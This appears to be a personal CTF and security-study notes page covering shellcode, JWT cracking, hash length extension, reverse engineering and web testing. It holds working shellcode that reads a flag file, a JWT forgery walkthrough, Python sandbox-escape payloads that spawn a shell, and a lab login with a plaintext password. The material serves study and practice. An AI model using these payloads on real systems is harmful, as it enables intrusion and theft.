        xor     edx, edx
        mov     dl, 13
        int     0x80

        ;; exit(0)
        xor     eax, eax
        mov     al, 1
        xor     ebx, ebx
        int     0x80


$ nasm -f elf32 test.s && ld -m elf_i386 -o test test.o
$ objdump -d ./test |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x6a\x0a\x68\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68\x48\x65\x6c\x6c\x89\xe1\x31\xd2\xb2\x0d\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"
*/

// gcc -m32 -fno-stack-protector -z execstack -o hello hello.c

int main(int argc, char *argv[])
{
  char shellcode[] = "\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x6a\x0a\x68\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68\x48\x65\x6c\x6c\x89\xe1\x31\xd2\xb2\x0d\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
  (*(void(*)()) shellcode)();
  return 1;
}

open, read, write

preudo code: tmp.c

#include <unistd.h>

int main()
{
    char buf[100] = {0};

    int fd1 = open("test.txt", 0);
    read(fd1, buf, 100);
    write(1, buf, 100);
}

echo hello > test.txt
gcc -o tmp tmp.c
./tmp  # output: hello

section .text

global _start

_start:
        jmp two

one:
        xor eax, eax

        ;; open
        pop ebx
        mov al, 0x5
        int 0x80

        ;; read
        xor edx, edx
        mov ebx, eax
        mov al, 0x3
        mov ecx, esp
        sub esp, 0x55
        mov dl, 0x55
        int 0x80

        ;; write
        xor eax, eax
        mov al, 0x4
        mov bl, 0x1
        int 0x80

        ;; exit
        xor eax, eax
        xor ebx, ebx
        mov al, 1
        mov bl, 99
        int 0x80

two:
        call one
        string: db "/home/orw/flag"

shellcode = b"\xeb\x28\x31\xc0\x5b\xb0\x05\xcd\x80\x31\xd2\x89\xc3\xb0\x03\x89\xe1\x83\xec\x55\xb2\x55\xcd\x80\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x63\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x68\x6f\x6d\x65\x2f\x6f\x72\x77\x2f\x66\x6c\x61\x67"

• Linux/x86 - Read /etc/passwd Shellcode (62 bytes)

x86

Calling Convention

aka: Call Convention

x86 Assembly/Interfacing with Linux - Wikibooks, open books for an open world

register mapping for system call invocation using int $0x80

syscall number	1st	2nd	3rd	4th	5th	6th	result
eax	ebx	ecx	edx	esi	edi	ebp	eax

syscall number

• x86.syscall.sh
• /usr/src/linux-headers-6.3.0-kali1-amd64/arch/x86/include/generated/uapi/asm/unistd_32.h

References

Wiki

• Calling Convention: x86 Assembly/Interfacing with Linux - Wikibooks, open books for an open world
• Architecture: x86 Assembly/X86 Architecture - Wikibooks, open books for an open world
• Instructions: x86 Assembly/X86 Instructions - Wikibooks, open books for an open world
• instruction listings: x86 instruction listings - Wikipedia

Other

• TEST (x86 instruction) - Wikipedia
• x86アセンブリ言語での関数コール
• X86アセンブラ/データ転送命令 - Wikibooks

x86_64

Calling Convention

x86 Assembly/Interfacing with Linux - Wikibooks, open books for an open world

register mapping for system call invocation using syscall

syscall number	1st	2nd	3rd	4th	5th	6th	result
rax	rdi	rsi	rdx	r10	r8	r9	rax

register mapping for library call

1st	2nd	3rd	4th	5th	6th
rdi	rsi	rdx	rcx	r8	r9

syscall number

• x64.syscall.sh

Format String Attack

• Exploiting a GOT overwrite - Binary Exploitation
• Tut05: Format String Vulnerability - CS6265: Information Security Lab
• fsbの資料
• Exploiting Format String Vulnerabilities scut / team teso September 1, 2001
• Format String Exploitation-Tutorial
  • Same PDF
• pwnlib.fmtstr — Format string bug exploitation tools — pwntools 4.11.0 documentation
• 日記: CTF やってみた(３)｜zk_phi

ELF

https://refspecs.linuxfoundation.org/elf/elf.pdf

Heap

• Preface - heap-exploitation
• Heap - Binary Exploitation
• The 67th Yokohama kernel reading party - YouTube

Use After Free

• CWE - CWE-416: Use After Free (4.13)
• Using freed memory | OWASP Foundation

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    char *buf1;
    char *buf2;
    char *buf3;

    buf1 = (char *) malloc(10);
    free(buf1);
    // printf("buf1: %p\n", buf1);

    buf2 = (char *) malloc(10);
    free(buf2);
    // printf("buf2: %p\n", buf2);

    buf3 = (char *) malloc(10);

    printf("buf1: %p\nbuf2: %p\nbuf3: %p\n", buf1, buf2, buf3);
}

Result

$ make malloc_test && ./malloc_test
make: 'malloc_test' is up to date.
buf1: 0x5593d3f5e2a0
buf2: 0x5593d3f5e2a0
buf3: 0x5593d3f5e2a0

Reversing

• Ghidra
• Compiler Explorer
• Computer Organization and Design ARM edition.pdf
• Online x86 and x64 Intel Instruction Assembler
• ReversingHero
• Debuggex: Online visual regex tester. JavaScript, Python, and PCRE.

Windows

• うさみみハリケーン
• PEView

Python

pyc Decompiler

• python-uncompyle6 - A cross-version Python bytecode decompile
• pycdc - C++ python bytecode disassembler and decompiler
• show_pyc.py

Uncategorized

• Pyarmor - A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts.
• pyinstaller - Freeze (package) Python programs into stand-alone executables

Android

Decompile

APK -> java

/usr/share/jadx/bin/jadx -d out APKey.apk

jadx-gui APKey.apk

Recompile APK

Decompile, Modify Smali, Recompile and Sign APK - Hebun ilhanlı

# apktoolversion: 2.7.0-dirty

# Decompile
apktool decode -r APKey.apk

# Modify smali
vi APKey/smali/com/example/apkey/MainActivity\$a.smali

# Re-compile. Generated to APKey/dist/APKey.apk
apktool build -d -f APKey

# Sign
cd APKey/dist/
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore APKey.apk alias_name

$ keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]:
What is the name of your organizational unit?
  [Unknown]:
What is the name of your organization?
  [Unknown]:
What is the name of your City or Locality?
  [Unknown]:
What is the name of your State or Province?
  [Unknown]:
What is the two-letter country code for this unit?
  [Unknown]:
Is CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown correct?
  [no]:  yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
        for: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
[Storing my-release-key.keystore]

$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore APKey.apk alias_name
Enter Passphrase for keystore:
   adding: META-INF/MANIFEST.MF
(snip)
  signing: classes.dex

>>> Signer
    X.509, CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
    Signature algorithm: SHA256withRSA, 2048-bit key
    [trusted certificate]

jar signed.

Warning:
The signer's certificate is self-signed.
The SHA1 algorithm specified for the -digestalg option is considered a security risk and is disabled.
The SHA1withRSA algorithm specified for the -sigalg option is considered a security risk and is disabled.

dotnet dnSpy

dnSpy

# In Kali
rm -fr ~/.wine
winetricks dotnet6
wine ~/tools/dnSpy/dnSpy.exe

Web

• OWASP Web Security Testing Guide
• HTML Standard
• W3Techs
• Temp Mail
• Analyse your HTTP response headers
• Detecting Security Vulnerabilities in Web Applications Using Dynamic Analysis with Penetration Testing
• CS253 - Web Security
• Static Badge
• regex101

Webhook Hosting

• Webhook.site
• Interactsh
• RequestBin
• Request Catcher
• Beeceptor

Specification

• RFC 9110: HTTP Semantics
• RFC 9113: HTTP/2

Vulnerability research approach

Taint checking / Taint tracking

• Taint checking - Wikipedia
• Taint tracking | Semgrep
• Ierae seccamp 2023
  • pdf

Fuzzing

• Continuously fuzzing Python C extensions | Trail of Bits Blog

Burp Suite

Generate a PEM Certificate and curl

curl -so ./burp-cert http://127.0.0.1:8080/cert
openssl x509 -inform der -in ./burp-cert -out ./burp-cert.pem

curl --proxy http://127.0.0.1:8080 --cacert ./burp-cert -s https://example.com/

OWASP

• OWASP Testing Guide v4 Table of Contents
• OWASP Top Ten
• OWASP Top 10:2021
• OWASP Cheat Sheet Series

Training

• Web Security Academy: Free Online Training from PortSwigger
• All labs | Web Security Academy
• Hacksplaining
• Practise and learn how to solve Capture The Flag challenges

Web Assembly

• WebAssembly
• WebAssembly | MDN
• Wasm By Example - Examples Listing

Basic Concept

• source language (C/C++, Rust, Go, etc...) -> Wasm
• Wasm is imported by JavaScript, then call exported a function

Compiler / Build Packages

• C/C++: Emscripten: Main — Emscripten 3.1.49-git (dev) documentation
• Rust wasm-pack: wasm-pack

Use the compiled WebAssembly…

• from JavaScript code
• as a CLI application
• from Node.js (with access to system resources)

Web API

• APIsec University – Become an API Security Expert

GraphQL

• GraphQL
• How to GraphQL - The Fullstack Tutorial for GraphQL
• GraphQL - OWASP Cheat Sheet Series
• chentsulin/awesome-graphql

Json Web Token (JWT)

• JWT Vulnerabilities (Json Web Tokens) - HackTricks
• JWT - JSON Web Token - Payloads All The Things
• ticarpi/jwt_tool: A toolkit for testing, tweaking and cracking JSON Web Tokens
• Home · ticarpi/jwt_tool Wiki
• JSON Web Tokens - jwt.io
• Hacking JWT Tokens: jku Claim Misuse | by Shivam Bathla | Pentester Academy Blog
• Bug bounty isn’t dying. It’s the future. · rez0

Cracking with hashcat

JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNyeXB0MCJ9.zbwLInZCdG8Le5iH1fb5GHB5OM4bYOm8d5gZ2AbEu_I
python3 ~/tools/jwt_tool/jwt_tool.py $JWT
# check: alg = "HS256"

hashcat -m 16500 $JWT /usr/share/wordlists/rockyou.txt --quiet
# output => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImNyeXB0MCJ9.zbwLInZCdG8Le5iH1fb5GHB5OM4bYOm8d5gZ2AbEu_I:catsarethebest

python3 ~/tools/jwt_tool/jwt_tool.py $JWT -I -pc identity -pv admin --sign hs256 -p catsarethebest
# output: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6ImFkbWluIn0.3xH8a2FskQJ3afYZeJCtwln4CRrwh4nidEy7S6fJoA0

Simple HTTP Server

BaseHTTPRequestHandler

from http.server import BaseHTTPRequestHandler
from socketserver import TCPServer

HOST = "0.0.0.0"
PORT = 8000


class RequestHandler(BaseHTTPRequestHandler):
    server_version = "my server 0.0"
    sys_version = ""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()

        print(f"{self.requestline}\n{self.headers}\n")

    def do_POST(self):
        self.send_response(200)
        self.end_headers()

        content_length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_length).decode("utf-8")

        print(f"{self.requestline}\n{self.headers}{body}")


TCPServer.allow_reuse_address = True

with TCPServer((HOST, PORT), RequestHandler) as httpd:
    print(f"Listening {HOST}:{PORT}")
    httpd.serve_forever()

• https://docs.python.org/ja/3/library/http.server.html
• https://kazuhira-r.hatenablog.com/entry/2019/08/12/220406
• https://github.com/python/cpython/blob/v3.11.4/Lib/http/server.py

Flask

app.py

from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    return "test"


if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=80)

• Quickstart — Flask Documentation

RequestBin

Custom Response by each URL path

def handler(pd: "pipedream"):
    if pd.steps["trigger"]["event"]["path"] == "/":
        msg = "foo"
    else:
        msg = "bar"

    pd.respond({
        "status": 200,
        "headers": {
            "Content-Type": "application/json"
        },
        "body": msg,
    })

Require Basic Auth

def handler(pd: "pipedream"):
    resp = {
        "status": 401,
        "headers": {
            "WWW-Authenticate": 'Basic realm="my realm"'
        },
        "body":"",
    }
    pd.respond(resp)

• Python
• Events

Browser Extension

• PenTest / BugBounty Firefox Extension Top 14

RDBMS

server

# MySQL
docker run --rm --name mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=password mysql:8-debian

# MariaDB
docker run --rm --name mariadb -p 3306:3306 --env MARIADB_ROOT_PASSWORD=password --env MARIADB_DATABASE=test mariadb:latest

client

mysql --silent -h 127.0.0.1 -u root -ppassword

Create Table

CREATE TABLE tbl1 (
    id int,
    foo varchar(255),
    bar varchar(255)
);

• Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql - Flatt Security Research
• CTF-Write-ups/Google CTF/Web/Log-Me-In

Install Oracle SQL*Plus DB client

https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation

export PATH=$PATH:/opt/oracle/instantclient_21_7
export SQLPATH=/opt/oracle/instantclient_21_7
export TNS_ADMIN=/opt/oracle/instantclient_21_7
export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_7
export ORACLE_HOME=/opt/oracle/instantclient_21_7

Web Archiver

• Webpage archive

Python Flask

SSTI Testing setup

from flask import Flask, request, render_template_string
app = Flask("myapp")
def test(p):
    with app.test_request_context():
        request.args.a = "a"
        print(render_template_string(p))

Service Worker

• Service Worker の概要  |  Workbox  |  Chrome for Developers
• Workbox  |  Chrome for Developers

Web Browser

Document

• Design Documents
• Inside look at modern web browser (part 1)  |  Blog  |  Chrome for Developers

Bookmarklet

• Bookmarklet Creator with Script Includer - Peter Coles

copy markdown format

let title = document.title.replace(/\[/g, '\\[').replace(/]/g, '\\]').replace(/\|/g, '\\|');
let link = document.URL.replace(/\(/g, '%2528').replace(/\)/g, '%2529');
let md = `- [${title}](${link})`;

setTimeout(() => navigator.clipboard.writeText(md), 100);

copy markdown format and description

let title = document.title.replace(/\[/g, '\\[').replace(/]/g, '\\]').replace(/\|/g, '\\|');
let link = document.URL.replace(/\(/g, '%2528').replace(/\)/g, '%2529');
let md = `- [${title}](${link})`;

let description = document.querySelector('meta[name="description" i]')?.content;
if (description) md += ` - ${description}`;

setTimeout(() => navigator.clipboard.writeText(md), 100);

multiple search engine

// Check `Sites can send pop-ups and use redirects` in chrome://settings/content/popups

const o = prompt('query: ', '');
const engines = [
  'https://searx.juancord.xyz/searxng/search?q=%s',
  'https://stract.com/search?q=%s',
  'https://yandex.com/search/?text=%s',
  'https://www.bing.com/search?q=%s',
  'https://www.google.com/search?lr=lang_en&q=%s',
  'https://www.google.com/search?lr=lang_ja&q=%s',
  'https://duckduckgo.com/?kl=us-en&q=%s',
  'https://duckduckgo.com/?kl=jp-jp&q=%s',
];
engines.forEach(function (e) { window.open(e.replace('%s', encodeURIComponent(o))); });

• How To Use URL Parameters To Change Your DuckDuckGo Search Settings | DuckDuckGo Help Pages

XMPP

XMPP client

• XMPP | XMPP Software
• Psi
• Converse.js
• MCabber Homepage

Web application frameworks benchmark

• Round 15 results - TechEmpower Framework Benchmarks

Crypto

• CryptoHack - A fun, free platform for learning cryptography
• The Cryptopals Crypto Challenges
• Boneh Publications: Twenty years of attacks on the RSA cryptosystem
• RSA暗号運用でやってはいけない n のこと #ssmjp
• quipqiup - cryptoquip and cryptogram solver
• Vigenere Solver - www.guballa.de
• Modular conversion, encoding and encryption online — Cryptii
• dCode - Solvers, Ciphers, Calculators, Decoders, Online
• NIST SP 800-38A, Recommendation for Block Cipher Modes of Operation Methods and Techniques
• CBC byte flipping attack—101 approach | Infosec
• CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
• Prime Factors Calculator
• factordb

RSA

• RFC3447 Public-Key Cryptography Standards (PKCS) #1: RSA Cryptography
• CTF crypto 逆引き - ふるつき
• RSA暗号

Hash Length Extension

• Hash Length Extension Attack - HackTricks
• iagox86/hash_extender

Tested

$ secret=$(hexdump -vn16 -e'4/4 "%08x" 1 "\n"' /dev/urandom)

$ echo -n "${secret}" | hd
00000000  30 35 64 32 33 35 37 30  33 61 63 36 33 36 33 61  |05d235703ac6363a|
00000010  35 61 64 65 63 32 32 37  32 66 36 32 64 61 65 34  |5adec2272f62dae4|
00000020

$ echo -n "${secret}data" | sha256sum
38d77dfacdbe32fd4e62ea173d0ae4cd7e80c7aa3fcf3d0f9b4febdb66d3ef81  -

$ ~/tools/hash_extender/hash_extender --signature 38d77dfacdbe32fd4e62ea173d0ae4cd7e80c7aa3fcf3d0f9b4febdb66d3ef81 -l 32 --data data --append appenddata --format sha256
Type: sha256
Secret length: 32
New signature: 4cb4e368d4d703314d274f9f5774853eea9044be70b92fbe5905749ae11de4e4
New string: 6461746180000000000000000000000000000000000000000000000000000120617070656e6464617461


$ newstr=$(echo -n 6461746180000000000000000000000000000000000000000000000000000120617070656e6464617461 | xxd -r -p)

$ echo -n "${secret}${newstr}" | sha256sum
4cb4e368d4d703314d274f9f5774853eea9044be70b92fbe5905749ae11de4e4  -

oneliner

gcd = lambda a, b: b if (a:=a%b) == 0 else gcd(b, a)

Forensics

Steganography

• StegOnline
• Steganography - A list of useful tools and resources - 0xRick’s Blog
• corkami/pics
• File Signatures
• List of file signatures - Wikipedia
• Aperi'Solve
• stegsee
• Binwalk
• pngcheck
• stegsolve

DFIR

• Challenges & CTFs - AboutDFIR - The Definitive Compendium Project
• MalwareTech - Everything Cyber Security
• VirusTotal
• Cisco Talos Intelligence Group - Comprehensive Threat Intelligence
• Zero2Automated
• sleuthkit/autopsy
• FTK Imager
• CFReDS Portal
• Eric Zimmerman's tools

Malware

• rshipp/awesome-malware-analysis
• Maldev Academy
• ANY.RUN

Malware sample

• MalwareBazaar | Malware sample exchange
• MalShare

Report

• The DFIR Report
• Research | Trellix Stories

Other

• Thumbcache Viewer - Extract thumbnail images from the thumbcache_.db and iconcache_.db database files.

Networking

• Wireshark User’s Guide
• endtoend.pdf
• End-to-end principle - Wikipedia
• 3 Minutes Networking

SSL/TLS

• TLS暗号設定ガイドライン　安全なウェブサイトのために（暗号設定対策編） | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
  • TLS 暗号設定 ガイドライン

openssl

s_client subcommand

# basic connect
openssl s_client -connect example.com:443

# -trace option: show TLS record and a parsed Certificate
openssl s_client -connect example.com:443 -trace

# input empty HTTP request using /dev/null
openssl s_client -connect example.com:443 -trace < /dev/null

x509 subcommand

# parse a Certificate
openssl x509 -in example.com.pem -noout -text 

# output Subject only
openssl x509 -in example.com.cert -noout -subject
# => subject=C=US, ST=California, L=Los Angeles, O=Internet Corporation for Assigned Names and Numbers, CN=www.example.org

# output Issuer only
openssl x509 -in example.com.cert -noout -issuer
# => issuer=C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1

# output Validity only
openssl x509 -in example.com.cert -noout -dates
# => notBefore=Jan 30 00:00:00 2024 GMT
# => notAfter=Mar  1 23:59:59 2025 GMT

# PEM to DER
openssl x509 -in example.com.pem -inform pem -outform der | hd
openssl x509 -in example.com.pem -inform pem -outform der -out example.com.der  # save as a file

# DER to PEM
openssl x509 -in example.com.der -inform der -outform pem

see details for X.509: RFC 5280: Section 4 Certificate and Certificate Extensions Profile

verify subcommand

openssl verify -CAfile <ca_certificate.pem> <certificate.pem>

rsa subcommand

openssl rsa -in

create self-certificate

openssl req -x509 -newkey rsa:4096 -noenc -out cert.pem -keyout key.pem -days 365 -subj /CN=example.com

OSINT

• OSINT Framework
• Google Dorks – We are OSINTCurio.us
• OSINT Dojo
• email2phonenumber
• sherlock
• Web-Check
• WhatsMyName Web

Game Hacking

• Guided Hacking - Learn Reverse Engineering & Game Hacking

Wi-Fi

• Pentesting Wifi | HackTricks | HackTricks
• wiire-a/pixiewps: An offline Wi-Fi Protected Setup brute-force utility
• Wifi Hacking Tutorials
• WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver
• Hack The Box :: Hack The Box
• Brute forcing Wi-Fi Protected Setup by Stefan Viehböck in 2011

Tools

• t6x/reaver-wps-fork-t6x

GitHub

Dork

• How to exclude user repository or organization repository from a search? · community · Discussion #23318
  • GitHub Code Search Exclude. e.g. -repo:github/git-msysgit -user:4n86rakam1

GraphQL API: Query Example

• Objects - GitHub Docs
• Explorer shortcut: Alt + 0 (Completion)
• Explorer - GitHub Docs

{
  topic(name: "php") {
    repositories(first: 50, orderBy: {direction: DESC, field: STARGAZERS}) {
    nodes {
        name
        url
        stargazerCount
      }
    }
  }
}

{
  topic(name: "php") {
    repositories(
      first: 10
      after: null
      orderBy: {direction: DESC, field: STARGAZERS}
    ) {
      nodes {
        nameWithOwner
        url
        stargazerCount
      }
      pageInfo {
        endCursor
        startCursor
        hasNextPage
        hasPreviousPage
      }
    }
  }
}

{
  search(
    query: "language:PHP stars:>10000 archived:no"
    type: REPOSITORY
    first: 10
  ) {
    edges {
      node {
        ... on Repository {
          nameWithOwner
          stargazerCount
          url
          isArchived
        }
      }
    }
  }
}

Pagenation

• Requesting a cursor in your query

Bug Bounty

Platform

• Intigriti
• HackerOne
• Bugcrowd
• Open Bug Bounty
• YesWeHack
• Crowdfense
• ZERODIUM

Available Programs

• Microsoft Bounty Programs | MSRC - Microsoft offers cash awards for finding and reporting certain types of vulnerabilities and exploitation techniques

Curated

• awesome-bug-bounty - A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.

Getting Started / Tutorials

• How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty | by Hussnain Fareed | InfoSec Write-ups
  • archive
• jhaddix/tbhm - The Bug Hunters Methodology
• daffainfo/AllAboutBugBounty - All about bug bounty (bypasses, payloads, and etc)
• Penetration Testing and Bug-Bounty Hunting
• Beginners Resources - Where to get started in bug bounty
• Bug Bounty Forum - Bug Bounty Forum is a 150+ large community of security researchers sharing information with each other.

Hacker101 Discord Server > #faq channel:

How to get started with hacking and bug bounties?

We've gathered some useful resources to get your started on your bug bounty journey!

• Guide to learn hacking https://www.youtube.com/watch?v=2TofunAI6fU
• Finding your first bug https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community
• Port Swigger Web Security Academy https://portswigger.net/web-security/learning-path
• Nahamsec's Twitch https://www.twitch.tv/nahamsec
• Nahamsec interviews with top bug bounty hunters https://www.youtube.com/c/Nahamsec
• Nahamsec's beginner repo https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
• Stök https://www.youtube.com/c/STOKfredrik
• InsiderPhD https://www.youtube.com/c/InsiderPhD
  • Series for new bug hunters https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw
• Jhaddix https://www.youtube.com/c/jhaddix
• Posts from Hacker101 members on how to get started hacking
  • zonduu https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f
  • p4nda https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html
    • also a blog on subdomain takeovers https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html
  • clos2100 on getting started without a technical background https://twitter.com/pirateducky/status/1300566000665014275
  • al-madjus from 0 to bug hunter https://klarsen.net/uncategorized/from-0-to-bug-hunter-my-journey/
• dee-see's resources for Android Hacking https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html
• hacker101 videos https://www.hacker101.com/videos

The ⁠questions-and-answers and ⁠hacking-resources channels have great resources in the pinned messages that will help you get started. You will find there all sorts of things to help you learn and progress.

Writeup

• ngalongc/bug-bounty-reference
• fardeen-ahmed/Bug-bounty-Writeups
• Writeups - Pentester Land
• InfoSec Write-ups
• https://www.google.com/search?q=bug+bounty+writeup&tbs=qdr:m

Blog

• バグバウンティ | クラウド型Webセキュリティ診断ツール - Securify
• 【バグハンターインタビュー】PentesterLand | クラウド型Webセキュリティ診断ツール - Securify

Tools

• bbscope - Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!

Other

• arkadiyt/bounty-targets-data/
• 2017年LINE Security Bug Bounty Programの結果について - LINE ENGINEERING
  • archive

Code Analysis

Papers

• Cefuzz: An Directed Fuzzing Framework for PHP RCE Vulnerability

Static Code Analysis

• Static Techniques for Vulnerability Detection
• security - Dynamic Analysis of PHP Web Applications to identify work flow deviations - Stack Overflow
• Static and Dynamic Analysis for PHP Security

Cheat Sheets

• The Ultimate List of SANS Cheat Sheets | SANS Institute

Linux

• Linux Security Expert

Bash snippet

Stopwatch

now=$(date +%s)sec; watch -n0.9 -t -p TZ=UTC date --date now-$now +%H:%M:%S

Upgrade all packages

apt-get update && apt-get upgrade -y && pip --disable-pip-version-check list --outdated --format=json | python -c "import json, sys; print('\n'.join([x['name'] for x in json.load(sys.stdin)]))" | xargs -n1 pip install -U && pip install virtualenv==20.21.1

Kali Linux

/usr/share/kali-themes/xfce4-panel-genmon-vpnip.sh

Windows

• net use - Windowsコマンド虎の巻

Active Directory (AD)

smbclient -U "jab.htb\jmontgomery%Midnight_121" -L "//10.129.230.215/"

• enum4linux | Portcullis Labs
• Internal All The Things

Unquoted Service

wmic service get name,displayname,pathname,startmode
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Powershell

• 32-bit or 64-bit? scripting - Determine if current PowerShell Process is 32-bit or 64-bit? - Stack Overflow

32-bit PowerShell

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

64-bit PowerShell

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe

Import-Module

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process
Set-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser

AD CS (Active Directory Certificates Service)

• Certified_Pre-Owned.pdf
• Certified Pre-Owned. Active Directory Certificate Services… | by Will Schroeder | Posts By SpecterOps Team Members
• TryHackMe | AD Certificate Templates
• CVE-2022-26923 (Certifried) explained

Install Microsoft 365 free

1. Download Office Deployment Tool (officedeploymenttool_*.exe) from here link

2. Execute officedeploymenttool_*.exe, then it generate setup.exe

3. Execute setup.exe

   .\setup.exe /configure configuration-Office365-x64.xml

RDP

xfreerdp3 /log-level:FATAL /clipboard /cert:ignore /size:1920x1500 /d: /v:192.168.0.107 /u:username

# OSWE
xfreerdp3 /bpp:32 +fonts +themes /rfx /gfx:AVC420:on +clipboard /compression /audio-mode:1 /gdi:hw /nsc /cert:ignore /tls:seclevel:0 /dynamic-resolution /network:auto /v:manageengine /u:administrator /p:studentlab

• Are those the best performance options/flags? · Issue #6647 · FreeRDP/FreeRDP
• Optimizing RDP Performance on Linux: My Best Settings with xfreerdp – Wapnet Blog

RDP over SSH

Linux

ssh -L 3389:127.0.0.1:3389 -N [email protected] -f; xfreerdp +clipboard /cert-ignore /size:1920x1500 /v:127.0.0.1 /u:username /p:; kill $(lsof -t -i:3389 -sTCP:listen)

smbclient

smb: \> prompt
smb: \> recurse
smb: \> mget *

Programming language

Python

Official

• PEP 0
• Format Specification Mini-Language
• Built-in Functions

Sandbox Bypass / Jail

• Bypass Python sandboxes - HackTricks
• ctf-wiki-en/docs/pwn/linux/sandbox/python-sandbox-escape.md
• Python Jails Escape | Exploit Notes
• Escaping the PyJail
• wanqizhu/pyfuck
• 各种姿势解析-python沙箱逃逸_python的沙箱逃-CSDN博客
• Pyjail Cheatsheet
• the pepsi place | Albatross: Breaking out of pyjail with your hands tied.

CTF Challenge

• TCP1P-CTF-2023-Challenges/Misc/vampire
• TCP1P-CTF-2023-Challenges/Misc/PyMagic/src/pymagic.py
• TCP1P-CTF-2023-Challenges/Misc/Cat
• 【ctf】HNCTF Jail All In One - 木鲸的记录
• snakeCTF2023-Writeups/misc/stressful-reader
• CVE-2023-46404
  • windecks/CVE-2023-46404: PoC and Writeup for CVE-2023-46404.

Useful code

from pprint import pprint

dir(__builtins__)
__builtins__.__dir__()

import builtins
pprint(dir(builtins))

# Reserved keyword
help("keywords")
# False               class               from                or
# None                continue            global              pass
# True                def                 if                  raise
# and                 del                 import              return
# as                  elif                in                  try
# assert              else                is                  while
# async               except              lambda              with
# await               finally             nonlocal            yield
# break               for                 not

help("from")

True and False Creation

all((()))   # True
all(((),))  # False

()==()  # True
()=={}  # False

_ == _  # True
_ != _  # False

Payload

[m for m in  ().__class__.__bases__[0].__subclasses__() if m.__name__ in '_wrap_close'][0].__init__.__globals__['system']('cat flag.txt')
''.__class__.__base__.__subclasses__()[104].load_module('os').system('sh')"

Decompile

• Decompile compiled python binaries (exe, elf) - Retreive from .pyc - HackTricks

CheatSheet

• Python3 Cheat Sheet | SANS

# show pydoc
python3 -m pydoc requests
python3 -m pydoc requests.Response

# now to epoch
from datetime import datetime
datetime.now().strftime('%s')
# output => '1700187759'

# fromisoformat
datetime.fromisoformat('2023-11-17T11:25:24+00:00')
datetime.fromisoformat('2023-11-17T11:25:24+09:00')

string, hex

import binascii

binascii.hexlify(b'abcd')
# => b'61626364'

int(b'61626364', base=16)
# => 1633837924

binascii.unhexlify(hex(1633837924)[2:])
# => b'abcd'

YAML Deserialization

• semgrep-rules/python/lang/security/deserialization/avoid-pyyaml-load.py
• codeql/python/ql/test/library-tests/frameworks/ruamel.yaml/Decoding.py

# Unsafe:
ruamel.yaml.load(payload)
ruamel.yaml.load(stream=payload)
ruamel.yaml.load(payload, ruamel.yaml.Loader)

# Unsafe:
ruamel.yaml.load_all(payload)

################################################################################
# C-based loaders with `libyaml`
################################################################################

# Unsafe:
ruamel.yaml.load(payload, ruamel.yaml.CLoader)

Create Python2/3 environment

Python 2

pip install virtualenv==20.21.1  # https://stackoverflow.com/a/76380501
